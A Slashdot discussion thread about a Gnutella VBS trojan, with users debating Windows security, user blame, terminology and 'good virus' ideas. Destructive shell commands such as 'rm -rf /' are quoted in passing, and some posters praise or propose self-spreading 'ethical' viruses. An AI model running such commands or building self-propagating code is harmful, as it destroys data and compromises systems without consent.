Gnutella VBS Worm

TRingstad writes: "ZDNet has an article about a new worm infecting Gnutella users. The worm changes the gnutella.ini file to accept VBS files and places 23 Trojan files in the Gnutella download directory so that others on the network may find them. It then creates a 'victim' file with some statistics on what generation of the worm infected the user and on what date. Finally, it copies a warning, 'If I was a naughty boy, I could use scripting to get name, email, whatever file I want.'"

Of course, if you run Gnutella

[ericr]

Under FreeBSD or Linux, *vbs trojans aren't much of an issue...

Silly Microsoft users, they almost deserve what they get. Why is no one suing the pants off of MS, since they practically sponsor/condone all these virii by intentionally using insecure technology?

The User was RIGHT

[Rilke]

I agree with the user in this situation. I should be able to open any e-mail I receive, and my mail reader sure as hell shouldn't be executing any code in that email without asking me first.

I receive unsolicited e-mail all the time, and I feel free to open it in mutt, because I know that embedded executables are not going to be run.

The user in this situation is absolutely correct. They're running under the assumption that just *looking* at an email should never be dangerous. They're assuming not only that a nobody would write a mail reader stupid enough to execute code without asking, but that if anybody did happen to write such a stupid program, the tech support department where they work would never allow such a program to be loaded on everybody's machine.

In a sane world, that would be a good assumption...

Re:The User was RIGHT

[Cally]

Don't be so proud of this technological terror you've created ....

http://www.securityfocus.com/vdb/bottom.html?vid =664:

Mutt Text/Enriched Handler Buffer Overflow Vulnerability

A buffer overflow vulnerability in Mutt's handlers for the text/enriched MIME type allows malicious
email messages to execute commands as the user running Mutt.

bugtraq id
664
object
mutt (exec)
class
Boundary Condition Error
cve
GENERIC-MAP-NOMATCH
remote
Yes
local
Yes
published
September 27, 1999
updated
April 11, 2000
vulnerable
Mutt Mutt 0.95.6
not vulnerable
Mutt Mutt 1.0pre3

Nothing comparable with Outlook's abominable security model, and of course it could only trash your own files ... but just cos you're on Linux doesn't mean you're 100% safe.
Camaron de la Isla 'When I sing with pleasure, my

Re:The User was RIGHT

[Rilke]

However, Gnutella is not an Email program,

No offence (well, hell, take offense), but did you even read the post I responded to? It was specifically about email, and it was from somebody in tech support telling a user not to even read email from somebody he/she didn't know.

Assumptions are exactly the problem. They're assuming that the attachment in the message they recieve (or the file that they downlod in THIS case.) is not harmful, and happily clicking away on it.

I disagree, I really do. There's nothing wrong with clicking on an attachment, or at least there shouldn't be. If it's harmful, then my mailreader shouldn't run it. It's that simple. I should be able to read text documents or view pictures from my mail reader, there's no good reason to execute code from there. And if I need to do this, make me be explicit about it, by piping the file to a specific command.

*nix isn't without sin here. Shell archives were a terrible idea, and they've rightly become quite rare. And any *nix mailreader that executed a .shar file merely because I clicked on it would be broken as designed.

As far as Tech Support goes, do you think that they should just disallow access to run any programs on a computer at all?

No, they should disallow the ability to run executable code directly from the mail reader. When somebody says to me "I received an unknown email", I should be able to say "Click on it and see what it is. No harm can come of that." My mailer sure as hell shouldn't execute a file just because it had a .pl extension, especially if the mailer didn't even show me the extensions by default.

Re:The User was RIGHT

[tringstad]

No offence...

None Taken, I'm not interested in a flame war, and I apologize if I came across that way.

...but did you even read the post I responded to?

I did not. Until you pointed it out, and I examined it carefully, I could not see that it was a reply to a post. It took some digging to find the post it was attached to. Sorry.
On to the meat and potatoes.

There's nothing wrong with clicking on an attachment, or at least there shouldn't be. If it's harmful, then my mailreader shouldn't run it. It's that simple.

I don't think it's that simple. How should your email client decide what is harmful and what is not? Wouldn't that be the job of Anti-Virus software? I agree that it would be nice if it had this capability, but I doubt that any of us would dare say MS Outlook isn't bulky enough already.

I should be able to read text documents or view pictures from my mail reader, there's no good reason to execute code from there.

I strongly disagree with this. Whether or not there is a good reason to execute code (or any other executable attachments) from within your browser depends on your environment, and frankly, I doubt that many of the users that you are defending want to be forced to save an attachment, figure out where they put it and then run it. As a matter of fact it is exactly the desire not to have to do this that has given MS the iron grip it has on consumers. (Blasphemy, I know!)

*nix isn't without sin here.

Indeed, but I'll be the first to say *nix are by far the lesser sinners. But the nixes don't have the ease of use and UI that is required by your average user. (Blasphemy again! Burn him!)

When somebody says to me "I received an unknown email", I should be able to say "Click on it and see what it is. No harm can come of that."

Here I admit I'm a bit confused. I can think of several ways that I can examine a program to see what it is without running it, but not a single way for an average user to do it. And even if they could, "ILOVEYOU" has certainly shown us that they'll run it anyway, "Just to see what it does".

-Tommy

Re:The User was RIGHT

[Rilke]

How should your email client decide what is harmful and what is not? Wouldn't that be the job of Anti-Virus software?

It's not Harmful the client should know about, it's just Executable, and that's not really all that tough. Sure, it's a tiny bit tougher when we're dealing with script files rather than binaries, but there's absolutely no reason the mail client can't know about these. I can seeing missing something like .py if somebody has installed python, but c'mon, .vbs? (I haven't used outlook in years, does the program recognize .vbs as executable and run it anyway, or does it appear to outlook to be a document file for the VBScript interpreter?)

And more importantly, in the corporate environment, there's no excuse for not letting the administrator set these things. I should be able to configure outlook to totally ignore certain types of attachments; if the user is advanced enough to change that setting, fine, but the innocent will be protected.

Whether or not there is a good reason to execute code (or any other executable attachments) from within your browser depends on your environment.

I don't see this, I really don't. Why should users need to execute emailed files? Self-extracting archives? Bad idea. I can agree with you here about the web browser, but not email. I can even agree about home usage, but we're talking about a corporate environment here.

But the nixes don't have the ease of use and UI

Agreed, I'm anything but a unix bigot here. But this thread started with a typical "blame the (L)user" attitude for an error that I strongly feel should be placed on the mail admin and on the software. The employee got an unsolicited resume, reading it should not be a harmful act.

And that's what really annoyed me about it, I hate this attitude. It's like forcing people to change passwords every 2 weeks "to enhance security", and then complaining because the "stupid users" are writing their passwords down on post-its. Well, of course they are. Who can remember 26 different passwords a year?

Here I admit I'm a bit confused. I can think of several ways that I can examine a program to see what it is without running it, but not a single way for an average user to do it.

They should be able to just click on it. If the mailer doesn't show it then it was harmful and should be deleted. And if you (not *you*, but the administrator) haven't configured your mail clients so that users can safely read their e-mail, (and there's lots of view-only software out there for Word processing files) then don't go complaining about stupid (L)users when something goes wrong.

And even if they could,"ILOVEYOU" has certainly shown us that they'll run it anyway, "Just to see what it does".

Oh, don't get me started on MS Word, I've fought with MS over that for almost a decade now. It would have been so incredibly simple to make Word safe in the corporate environment, and they simply refused to do it. Check out this page for a fun story of dealing with MS.

Re:The User was RIGHT

[tringstad]

I agree with the user in this situation. I should be able to open any e-mail I receive, and my mail reader sure as hell shouldn't be executing any code in that email without asking me first.

That makes perfect sense. However, Gnutella is not an Email program, and nothing is being executed without being asked to. Nor is anything being executed without being asked to in the case of ILOVEYOU and MS Outlook, which is what I assume you are talking about.

I receive unsolicited e-mail all the time, and I feel free to open it in mutt, because I know that embedded executables are not going to be run.

That's great too, but the problem isn't with just recienving email. And in the case of ILOVEYOU (if that's what we're talking about) embedded executables weren't being automatically run. I could just as easily send you a program as an attachment in Mutt, and if you ran it and it formatted your drives, it would be no different.

The user in this situation is absolutely correct. They're running under the assumption *snip*

Assumptions are exactly the problem. They're assuming that the attachment in the message they recieve (or the file that they downlod in THIS case.) is not harmful, and happily clicking away on it. As far as Tech Support goes, do you think that they should just disallow access to run any programs on a computer at all? That way nothing bad can happen, eh?

-Tommy

The Power of Freedom

[extrasolar]

This is the way I see it. And this isn't only about the Gnutella Worm, its about viruses in general. In any truely free system (free as in free speech, of course), you can not fully prevent one person from causing harm onto another. You can restrict the system, create more restrictions and secure, but then some freedom is lost. That is because freedom relies upon people who choose not to cause harm onto other people.

In a specific sense, this guy who created the worm is only exploiting the freedom he was granted. Thus people start locking down and all of us loose a certain amount of freedom.

There is a very good reason why we dislike people who pull these kind of stunts. It is because we know that if we invested that kind time annd effort in creating a virus or worm, we could do it. But we don't. Because we want to keep our freedom on the internet. Because we know that no one ever said we couldn't cause harm to other people's systems. Because as long as we have freedom, we *know* we can cause harm. But we don't because we are moral beings.

The Power of Freedom is directly our ability to influence others and ourselves. If you can't see this---if you only see the internet and other users of the internet as some sort of game, then you do not deserve the little freedom we have left.

Time for a little maturity (speaking from a 17 year old :)

Problem with this worm...

[lpontiac]

Is it just me, or could this (whatever it is - 'trojan horse' sounds good to me) do what it does just as well if it were compiled code, rather than a VBS? That way, it could also target the users without scripting enabled.

To whoever wrote this: learn C, or C++, or something better than BASIC. Trust me, it'll do you wonders :)

Re:Not a worm!

[Kinthelt]

Get your definitions right, ZDNet.

I've been noticing the same things in just about every virus-related news story. My favourite mis-definition was one I saw a few weeks ago: "A worm is a virus that can replicate itself".

D. All of the above

[silicon_synapse]

Virii/worms/trojans/whatever rarely fit nicely into only one category but rather have traits from two or more families of pestilences. This vbs propegates like a worm yet decieves like a trojan.

Re:Really Clever?? Are you kidding?

[jabber]

Careful now, there have been some infamous online discussions about the origins of AIDS, and HIV's apparent preferrence for certain subsets of society..

Ignorance, thankfully, can be cured with education. Stupidity and arrogance on the other hand...

Besides, getting rid of the 'stupid' would just raise the bar of 'average' higher. :)

Re:Linux enters the mainstream?

[saridder]

MSN's homepage and Hotmail. Both suck unless you have VB turned on.

Re:Humans weak. Grunt, grunt.

[Vicegrip]

Not to mention the fact that most Windows users run with Aministrator (root) privileges.
Why?
Because there is no easy way to switch to root to do useful things like install software. Until Microsoft provides their OS with a su like mechanism there will always be a plephora of scripts-viruses-dumbusers trashing a system because the OS simply lets them.
Users are lazy.. nobody wants to shut everything down just so they can quickly do something as root.
None of these VBS scripts would ever have been able to do anything other than forward themselves if people ran their systems with proper user privileges.
I mean, what kind of modern OS gives users the option to "always assume its them" when they turn the machine on? bleah....
Windows:- obfuscation of a whole other kind....

Re:Conspiracy?

[pdk]

Maybe it was AOL trying to stop the profileration of the client, since they tried to shut it down earlier this year. After all, it goes against the whole AOL/Time Warner record company kinda deal.

Re:Open Source is Secure

[brandond]

One example does not constitute a proof. Don't believe me? Two is a prime number. Two is also an even number. Does this mean we can assume that all even numbers are prime? Or that all prime numbers are even? Sorry.

Second, while I agree that OpenBSD is a very secure OS, to state that it is "the most secure" is a stretch. There are other OS's out there which are also considered very secure. IBM's (closed source) OS/390 which runs on the mainframes for many (most?) banks is also very secure. To argue which is "more secure" is futile.

So, the previous point stands. Open Source != Secure.

-----

Re:Good viruses?

[Whackamole]

It's a natural law: Users are unfailingly likely to open trojans on themselves regardless of delivery method or quality of disguise. When I helped admin a network, we thought it would be a fun test to send around an email as below. The script would really post a file to some "wall of shame" that we could make available. We felt confident that there would be more than a couple users caught red-handed. Title: This will blow your hard drive away Double-clicking on the following attachment will delete your HD partition and you will lose all information on C: Attach: delete_HD.txt.vbs

Re:When will this run on linux

[Pflipp]

> I mean ... with all the VBS files flying around when will somebody port Visual Basic Sripting
> support to linux. I am sick of having to run Windows just to get a VBS worm. Is somebody
> working on this already?

Prepare for a great shock, but a VB clone is indeed being made for Linux. What's worse, the people of Evolution seem to be very interested in it. What's even more queer, it was available on the GNU Task List for ages...

I never quite understood the reason; they say that GNOME Basic (= the name) is built from the ground up to be secure. But what do you need VB for besides for virus writing anyway?

OK, maybe for macros, but I don't want crappy VB *applications* in Linux. Having to _download_ 4 Mb to get a program that _uploads_ your IP address sux. Especially when it is also crappy, shareware, and it requires some obscure *vbs.dll libs you don't have. Yuck!

Besides, we have tons of languages with "macro capacities" already.

So even though I cannot see WHY, there IS VB for Linux !!!

It's... It's...

And if they run it, then what?

[FascDot+Killed+My+Pr]

Are you going to deride the UI of their OS: "It should highlight viruses in yellow."
Are you going to lambast the software maker for 'poor security': "It should auto-delete attachments"
Are you going to install virus detection software: "THAT'S taken care of--until I need to upgrade"

Or are you going to address the real problem: "Listen you knuckleheads, don't run programs unless you know what they do and who they are from".

I am very sympathetic to people who don't know how to use computers--I just gave my mom some of her first lessons on "using the Internet" this weekend. I am NOT sympathetic to people who don't listen or think.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?

Re:And if they run it, then what?

[extrasolar]

Actually it is a good exercise. It seems that after a while people would learn to be more careful.

Re:And if they run it, then what?

[jbarnett]

I am not turning this into a whole OS security model vs stupid user war.

If my grandparents get infected with a virus, worm or buggy program, guess who gets to clean up the mess? Me. I am trying to put some basic sense in their heads so I don't have to go over there and restore it.

If they where running Unix or anything else I would say "Hey when someone says try `rm -rf /` you know they are kidding right?"

I don't know or really care if it is the fault of the user or the security model of the OS, the only thing I know is that I don't like restoring a computer from OS up when it could be prevented with a few precautions (in this case information the user)

Me sending them that program is my way to "test" them, you know those fire drills you had in school? that is what I am trying to do, it is intresting to see users reactions, but that isn't the point.

The point is, when they have a fire in there house they will make it out alive, err I mean when there is a virus in there house they, the point was, as I stating is so that they know how to use fire to kill any virii that may be infecting there house due to biological warfare started by malcious computer users...

As with any system (strong securtiy policy or not), you have to inform the users for the strengths and weaknesses of the system. Even if you have a extremely secure system, if you post the username and password to anyone, it becomes as secure as a overweight high school girl going to a dance...

I am trying to stay away from the "stupid user vs insecure OS" war going on, but I think both sides agree that the user needs to be informed of basic security measures. A Unix system can be secure tell Bob posts the root password on irc...

To test this theorgy someone please post there root password and ip on slashdot. :)

(techinally if it was behind a firewall and had tcpwrappers installed and telnet/ftp/etc disable it still could be consider secure)

And 17 varieties

[blixco]

with 666 lines of code. Damn.

Re:clearing things up

[jbarnett]

You can get basic to work in Linux. I forgot the name of the program, but IIRC it was on Slackware 3.5. I bet you could port visual basic to Linux, and then set the premissions to 4755 with owner root for the runtime interputer, that should work.

I think most people firgure it like this

GNU == Unix
UNIX == GNU/Linux
GNU/Linux == Linux
(GNU *anything* || anything OpenSource) == Linux

which I am not claiming it is right, but when I first heard GNUtella, I thought it was a Unix program from the Free Software Foundations...

What does the "tella" stand for anyways?

Re:Gnutella is closed source, hence not secure

[Old+Wolf]

Oh rubbish.

When it happens in MS Outlook Express, it's MS's fault and OE's fault. When it happens in Gnutella it's the operating system's fault. Couldn't see that one coming from you Linux zealots.

Having executable files is not an OS fault.
.VBS is no different to .EXE , as far as executability goes. The problem is with dumb users who execute the executable file, or with software that allows an executable file to be automatically executed.

Note: Executable file does not necessarily mean +x on *nix; as script files handled by a script processor do not need to be +x (eg. perl, python, php, ini, bashrc, etc.)

Re:asm

[harmonica]

Seriously though, if Microsoft wanted to make it more security, give it user premissions like Unix,

NT has those permissions. For Win9x to have them, they had to change the file system (FAT) and some other things, breaking their whole we-remake-DOS-once-a-year-and-you-better-buy-it compatibility. So, nothing will change.

Re:my favorite is the html generating scripts

[AugstWest]

sure. it's right here.

Re:untrue

[b_pretender]

You should clarify that.

Doesn't happen on your *nix box.

--

Re:Reminds me of this UNIX "virus" I recieved once

[roman_mir]

Big deal. I conducted an experiment: a user gets a file that says: This is the Unix version of "I Love You" which works on the honor system. If you receive this mail, you should delete a bunch of GIFs, MP3s and binaries from your home directory, then send a copy of this email to everyone you know and then click on the following link: click this in order to increment the count of systems that this virus had spread to. Thank you. ----- The worst thing is that in less than a week over 480 clicks have being recorded!

Re:...but remember, Gnutella isn't actually weak..

[DrTomorrow]

...but rather weaknesses in the Windows operating system and more importantly, the user

What is the weakness of Windows? Windows makes it easy for stupid people to shoot themselves in the foot.

If Linux was just as popular with stupid users as Windows is, something similar could happen with Perl scripts. If the user runs something dangerous without knowing what it is, the user is to blame, not the OS.

Re:...but remember, Gnutella isn't actually weak..

[/]

People have to be told that "You just don't run stuff from an untrusted source."

And by "trusted", you have to specify not just "I know this person and he doesn't want to hurt me maliciously" but also "I trust whatever he's running on his system not to hurt me". The recent Outlook worms et al have demonstrated that any idiot running an insecure system can spread all sorts of nasties to his friends and colleagues, who normally trust him.

Is this really a worm?

[glitch_]

Can this really be classified as worm, since it has to be downloaded by other users? Also, how does this go about making users download it?

Re:Is this really a worm?

[eudas]

they should call it something new. call it a boobytrap -- that's what it really is anyway. looks to me like it catches lots of them. (the cgi script posted earlier today certainly caught me. what a maroon. *bonk self*)

eudas

Re:Is this really a worm?

[Oblio]

To quote the article, it is in files marked "Pamela Anderson movie listing.vbs, collegesex.vbs, Battlefield Earth.vbs, Napster Metallica Crack.vbs and NSync.vbs" [...]And think about it... would a good movie be only a few thousand bytes long???

Are you accusing battlefield earth of being a good movie? :) : )

Re:Is this really a worm?

[Misch]

PamelaAndersonMovie.mov, collegesex.zip, MetallicaMP3crack.zip

To quote the article, it is in files marked "Pamela Anderson movie listing.vbs, collegesex.vbs, Battlefield Earth.vbs, Napster Metallica Crack.vbs and NSync.vbs"

Because of the way windows works, you may see something like "PamelaAndersonMovie.mov.vbs", much like the ILOVEYOU virus had. But more often, Windows defaults to not showing the extension on .vbs files.

Gnutella though, will show the .vbs extension before you download. And think about it... would a good movie be only a few thousand bytes long???

The problem is that the amount of common sense in the universe is a constant, however, the population keeps rising. This particular one can only really hit your system if you download and run it.

Re:Is this really a worm?

[Biff+Cool]

Melissa ran automatically but I never heard of ILOVEYOU running without loading the attachment. What feature was that?

Conscience is the inner voice which warns us that someone may be looking.

Re:Is this really a worm?

[AstroJetson]

I can't answer your first question, but seems like 'worm' is as good a handle as we've got right now. Maybe this calls for a new classification.

As to the second question, it creates shared files with names like PamelaAndersonMovie.mov, collegesex.zip, MetallicaMP3crack.zip, etc. In other words it gives them attractive sounding names in the hopes that someone will see them and come download them.

Re:Is this really a worm?

[rifter]

I think here they are aiming for the less intelligent/unwary among users, like usual. It also appears to be working.

Re:Is this really a worm?

[glitch_]

Again, i spoke before I read. After reading, I still believe that this can't be classified as a worm. With the new spread of e-mail worms/virri/trojans, it seems worm has become a new buzzword. When the media classified everything as viruses, we yelled, saying it is a worm...now, it isn't a worm and they are calling it one. The problem lies in an undereducated media, and an overabundance of people willing to trust them.

Re:Is this really a worm?

[Skeezix]

I wouldn't classify it as a worm any more than I'd classify a script that does "rm -rf ~/*" and is disguised so that surfers don't think it's malicious, so they download it and run it.
----

Re:Is this really a worm?

[Kvan]

Because of the way windows works, you may see something like "PamelaAndersonMovie.mov.vbs", much like the ILOVEYOU virus had. But more often, Windows defaults to not showing the extension on .vbs files.

This is not entirely true--".mov" is usually also a registered extension (I think it is by default, in fact), so you'd see "PamelaAndersonMovie", with the VBScript icon. I doubt any of the people who have extensions turned off know what the different icons look like, though, so they click it anyway.

Which makes me wonder: Am I the only one with the distinct sensation that only the clueful users actually know and recognize different types of icons? I mean, they're supposed to make it easier for clueless users to figure out what things are, but in practice it seems that this is exactly the class of users who don't get them.

"A *person* is smart. People are dumb, panicky, dangerous animals and you know it."

Re:Is this really a worm?

[Anonymous._.Coward]

> Anyone who doesn't know not to run a vbscript file deserves to be infected.

I dunno about this. Seems to me like a lot of people will click/execute/rm -rf *.* if you tell them to. Look at the effect on slashdot that the "This is more informative" link had. Slashdot is supposed to be an informed discussion group but you still happily clicked on a CGI script that took your cookie and posted a comment to /. in your name.

Re:Is this really a worm?

[Biff+Cool]

AKAIK A worm is a piece of code that doesn't require user interaction to spread (e.g. the internet worm which exploited a buffer overflow to write executable code into memory and trick the computer into running it instead of the next instructions). This requires (just like ILOVEYOU) that someone run the script.

Conscience is the inner voice which warns us that someone may be looking.

Re:Is this really a worm?

[grahamm]

It sounds more like a Trojan Horse (a tempting 'gift' left outside the city gates) but that term has already been taken.

Re:Is this really a worm?

[mikpos]

You answered your own question. A malicious piece of code disguised as an attractive piece of code is called a trojan.

Re:Really Clever.. Actually...

[CptnHarlock]

Many servers simply house large numbers of files (with appropriate names) that redirect users to the owner's porn site or places a desktop link to said porn site.

Actually... It's just a couple of servers that are actively monitoring the searches (keywords) and generate the same files with the search keywords as filenames so that less intelligent users download the html and click them.. One of the spamers even ads a space=" " as the first character on the filename so that it gets on top of the list if you are sorting by filename.. Clever and immensly annoying.. I checked one of the spammers IP# and mailed to the webmaster of the site the spam was redirecting to but I doubt he'll do anything about it.. After all - the spammer is generating trafic..

Thank you.
//Frisco
--
"At the end of the journey, all men think that their youth was Arcadia..." -Goethe

Re:...but remember, Gnutella isn't actually weak..

[DrTomorrow]

Windows doesn't differentiate between "view" and "execute".

Should it? When you double-click on a file, Windows tells the registered application to open this file. Windows tells Notepad to open .txt files. Windows tells WScript to open .vbs files. Windows has no idea as to what the application is planning to do with the file (execute or view).

Maybe the answer is to remove the registered filetype mappings. If you want to open a file, you must open it from within an application. Clicking on a file does nothing.

As I said, Windows makes it easy for a stupid person to shoot themselves in the foot. It's still mainly a user problem.

Good viruses?

[Shadowell]

Is it just me or is this the first one out there that actively warns poeple about what it can do? Perhaps people will wake up finally.

Re:Good viruses?

[slycer]

People will not wake up. I remember reading somewhere (really don't remember) - maybe it's urban legend - about someone that created a script that would simply pop up a message on the persons screen. He sent it out to the office stating - This is a Virus - DO NOT OPEN IT.

Apparently (many!) people still opened it.

Re:Good viruses?

[Rilke]

No, the first big MS Word virus, way back in 95 or so, was exactly like this. It caused no damage, it just propagated itself to try to make people aware of the huge security hole in Word. The payload said something like "Now I think I've proved my point".

MS ignored it of course, and even released a new version of Word about a year later that opened the hole even further. Melissa, et. al. followed long after that.

Re:Good viruses?

I made a version of the ILOVEYOU virus that I sent to friends. It did not actively propogates itself, but, instead, but a bunch of messages in one's drafts folder just to prove how easy it *could've* been to do harm. It also informed them of their stupidity and finally showed them the source code. I think perhaps people should selease a non-destructive / teach-you-a-lession virus. The only problem is, though, in order to make itself propogate, one would have to send it to many people, which can be a destructive act when it brings down mail servers. How's that for a Catch-22?

Re:Good viruses?

[darkith]

The public can't wake up, cause they don't know they're asleep.

Still need a good compromise between

• properly written, secure software
• secure, but unrestrictive (if possible) default settings
• (l)user education
• vigalence
• the occasional ok/cancel box that smacks the user upside the head if they click ok/cancel without reading it

It'll be interesting how the acceleration in the rate at which information spreads affects crime and mischief in general...

Oh, and I still think people shouldn't praise open-source to the ends of the earth...it may be better than some/most of the alternatives, but I think it ain't no holy grail.

This is important moderate it up

[rifter]

This post is extremely relevant and should be moderated up. Just because it is a reply to a first post does not mean the first post or thr reply are irrelevant. For once, a first post actually contained insightful content and it and the reply should have been moderated likewise.

The fact that nothing *nix is affected by this was missed by ZD (of course!) Is it gonna be missed by slashdot too because of bad moderation?

Ethical "Attack"

[Proteus]

Well, I'm glad to see that the "hacker's ethic" isn't dead yet.

This could easily have been a lot worse -- the author could have trashed the systems of victims. However, it is simply a warning created to illustrate a serious security hole. Kudos! This is the ethical side of hacking that was always encouraged by the community as I was learning.

And spare the "hacker v. cracker" definition wars -- IMO, crackers are malevolent, and the author of this worm is certainly not.

--

Re:Ethical "Attack"

[Cally]

By this standard the ILOVEYOU author must also have been a white-hat -- well, grey-hat anyway -- consider, (a) 'ILOVEYOU' subjectline, without spaces, thus v easy to filter; (b) the fact that it could clearly have been /way/ more destructive.

[off-topic] Still it doesn't seem to have had much effect on luser's behaviour. I guess we'll just have to wait for the Big One before people start to realise that an office with Microsoft /anywhere/ is a disaster waiting to happen.
Camaron de la Isla 'When I sing with pleasure, my

blah bla-blah

[captainchronic]

Heh, it was only a matter of time. If only they'd do it for metallica users of napster!

Blah!

Conspiracy?

[deefer]

Is it just me, or are there more & more viruses/trojans crawling out of the woodwork of late?
Is it an underground effort by the Linux zealots to undermine Windows? Is it a cunning ploy by Micro$lop to get people to buy W2K?
Or is it the anti-virus vendors drumming up sales?
Or am I just paranoid, and it's all coincidence?

Strong data typing is for those with weak minds.

Re:Conspiracy?

[deefer]

Hmm, to each his own.
Refer to the first line again, AC...
I rest my case...
And posting at +2 because I am prepared to be counted by my words... I could get snotty here but... You're not worth it.

Strong data typing is for those with weak minds.

Re:Conspiracy?

[matt_martin]

Think about it, thousands of "security experts" milked billions from all industry a whole by pushing Y2K paranoia.

Well, the big day has come and gone but these people still need to eat. Of course they are going to make every attempt to stay relevent and employed by making a huge scene out of every threatening VBS file they can find. (they probably pay MS to "accidentally" leave some security holes open)

"I heard there was a dangerous script somewhere on a computer once. Pay me money so you can feel better about it."

Meanwhile my work computer runs at about 1/3 efficiency because it is busy virus-scanning my text data files. (no,I'm not allowed to change the configuration...to suggest so would probably put me on some list somewhere)

Re:Conspiracy?

[quonsar]

Think about it, thousands of "security experts" milked billions from all industry a whole by pushing Y2K paranoia.

bilk millions to milk billions. Poetic injustice, you know...

|ducking and grinning|

======
"Rex unto my cleeb, and thou shalt have everlasting blort." - Zorp 3:16

Re:Conspiracy?

[MrEd]

I believe that a very famous science fiction author (whose name escapes me) once said:

"Never attribute anything to malice that can be accounted for by stupidity."

Re:Conspiracy?

[pq]

I believe that a very famous science fiction author (whose name escapes me) once said: "Never attribute anything to malice that can be accounted for by stupidity."

This is Hanlon's razor (not Heinlein): "Never attribute to malice that which can be adequately explained by stupidity."

Re:Conspiracy?

[kz45]

what you don't realize, is that many features in windows(98 at least) require vbscript/javascript. Do a search for *.htt(some are hidden files) to see what I mean....

it was microsofts answer to totally integrate IE within their OS

Re:Conspiracy?

[AstroJetson]

Is it just me, or are there more & more viruses/trojans crawling out of the woodwork of late?

Seems that way to me too. I think the real potential of VBS is just now being realized.

Re:Conspiracy?

[trog9000]

Microsoft more than likely has their hands full coding the next release of their megavirus, which they sell as an operating system.

Sorry to be pedantic, but Microsoft doesn't write viruses...they write trojans...nasty MBR overwriting trojans at that...

(Got important data stored in my MBR ya know...usually takes me a few tries to remember which partition is supposed to be mounted on / )

Re:Conspiracy?

[MrEd]

Hanlon, Heinlein, close enough eh?

Thanks for the correction.

Re:Conspiracy?

[Signal+11]

Or am I just paranoid, and it's all coincidence?

Just stay online for a few more minutes and I'll have the answer for you. Also, pay no attention to the new icon in your system tray...

Re:Conspiracy?

[Anonymous._.Coward]

What with all the fuss over Metallica, Dr. Dre and Napster I wonder who wrote this worm? Surely a really good way to scare people off using these files sharing/copyright infringment applications would be to write a worm or two, release them and scare the general public into never sharing files with strangers again.

I am paranoid and it's no coincidence.

Re:Conspiracy?

[IHateEverybody]

Is it just me, or are there more & more viruses/trojans crawling out of the woodwork of late?
Is it an underground effort by the Linux zealots to undermine Windows? Is it a cunning ploy by Micro$lop to get people to buy W2K?
Or is it the anti-virus vendors drumming up sales?
Or am I just paranoid, and it's all coincidence?

It's the flavor of the month combined with typical sensationalist "journalism." Combine big, largely made up numbers ("ILOVEYOU virus causes $5 billion in damage to U.S. corporations!") with the current headline addicted nature of news in the United States and you've got the press hyping up every new bug as a potential digital Chernobyl. With the Elian story winding down and no recent spectacular celebrity deaths, the press will continue jumping on every virus as a potential huge ratings/eyeballs grabbing headline for the time being.

Re:Conspiracy?

[ethereal]

Is it an underground effort by the Linux zealots to undermine Windows?

I don't think any help from Linux zealots has been necessary - Windows has plenty of built-in features that undermine it on their own :)

Re:Conspiracy?

[carlos_benj]

"Or am I just paranoid, and it's all coincidence?"

I think it's a conspiracy by the paranoid so that they can feel better about all the time they've wasted worrying about other things.

carlos

Re:Conspiracy?

[deefer]

Heh! No there isn't!!!
W17h m1 31337 h@xx0r 5k1ll2, I c4n 533 j00 0n 127.0.0.1, Signal_11 !!!
S74nd 8y 4 53r10u5 h@xx0r1n9!!! 1 w1ll 8r1n9 joo d0wn 4nd MSDOS j00!!!




For the humour-impaired, I'm kidding, OK?
Don't you wish we lived in a world where disclaimers like this weren't necessary?

Strong data typing is for those with weak minds.

Re:Conspiracy?

[IronChef]

Let's hear it for Microsoft's Virus Building Script!

Why can't they issue a serurity patch for Windows that adds a control panel setting for VBS? Be default, the system should DISALLOW the execution of *.VBS files. Turn it on of you are an author and you know what you are doing.

I just did a quick search of my C drive... there are 6 VBS files, all in a samples directory. This does not look like a technology that needs to be enabled by default. If the file type association for VBS was clobbered, or if VBS files were neutered in some other way, would this have any negative impact on Windows? Someone must know.

Here's an idea: someone should modify the ILOVEYOU virus so that it does the following:

- Reads address books and replicates iteself as usual

- On the "victim" machine, it DISABLES the future execution of Visual Basic Scripts. The virus that disables future viruses!

Re:Linux enters the mainstream?

[Sancho]

VBS is good just as any scripting language is good. You can script in it. I won't go as far as to say it's as good as Perl or other scripting languages, but it's used for similar purposes. Inherently, VBScript isn't bad. It's no worse than any other scripting languate. The problem is a combination of things, mostly OS and OS settings.

But how is it pronounced?

[Neuracnu+Coyote]

I was reading a Newsweek article (linked off the wego Gnutella site) that claims it's "pronounced New-tella." Is it?

I always pronounced it like the spread, with the G being silent: nuh-TEL-uh.

Another friend claimed that he pronounced it like other Gnu software projects, giving the G sound: guh-new-TEL-uh.

Thoughts?

Re:The Worm is a HOAX!

[Sune+DK]

Forget I ever wrote that!

Re:hrm

[extrasolar]

Why, again is it stupid? I know it is stupid but, why?

Re:Not a worm!

[envelopush]

Yes, they both entice user to run the worm/trojan.

The difference here is...

Once the user has run ILOVEYOU worm, it copies itself as multiple files on the host machine *and* uses Outlook to self propogate to other peoples machines.

When the user runs Gnutella VBS trojan, it copies itself as multiple files on the host machine, does not send itself to others. It is merely *available* to others via Gnutella.

Re:Gnutella is closed source, hence not secure

[Chiasmus_]

I just don't think the open source movement has much to do with this. Sorry, *nix guys.

An environment where people anonymously share executable files is almost by definition insecure. I guess there are still people out there that figure if it says "Starcraft_Crack.CRACK.VBS", it's a Starcraft crack.

Personally, I think using Gnutella is a little bit like sailing from port to port and having unprotected sex with all the native prostitutes.

I don't have any Moderator Points, But...

[Chiasmus_]

Good post, man.

Misunderstanding

[mccormick]

I think people are misunderstanding this situation.. Some are saying that if Gnutella were opensourced, a problem like this wouldn't exist (for various reasons.)

This is incorrect. First of all, Gnutella's network protocol (half of which is based on HTTP) is documented, and a variety of both open and closed source clients exist.

This trojan doesn't use any kind of a backdoor in Gnutella technology. Rather, it's spread by the users themselves. They download a file (like 'collegesex' or whatever), which is actually a .vbs script, double click it, and then the trojan does it's stuff.

So, this is no problem with Gnutella. It's just users who don't have a strong enough security background, and who can't decern scripts from other types of files.

This can happen to anyone, on any OS. Just so happens that Microsoft's are the easiest to use, and generally have the users that would fall for it.

Hope this clears up some misinformation. Guys/girls, please try not to jump to conclusions about everything (like how open source would have prevented this.)

Re:Misunderstanding

[hal200]

Let's just for the sake of argument consider it not as a 'conclusion' but more as a 'working theory'...Up until Melissa, the 'working theory' was that you couldn't get a virus by opening an email...now, as we all know, it's a whole new ballgame.

